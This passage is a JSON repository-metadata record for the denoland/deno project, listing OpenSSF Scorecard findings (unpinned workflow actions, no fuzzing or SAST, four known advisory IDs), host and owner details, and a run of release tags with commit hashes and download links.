https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.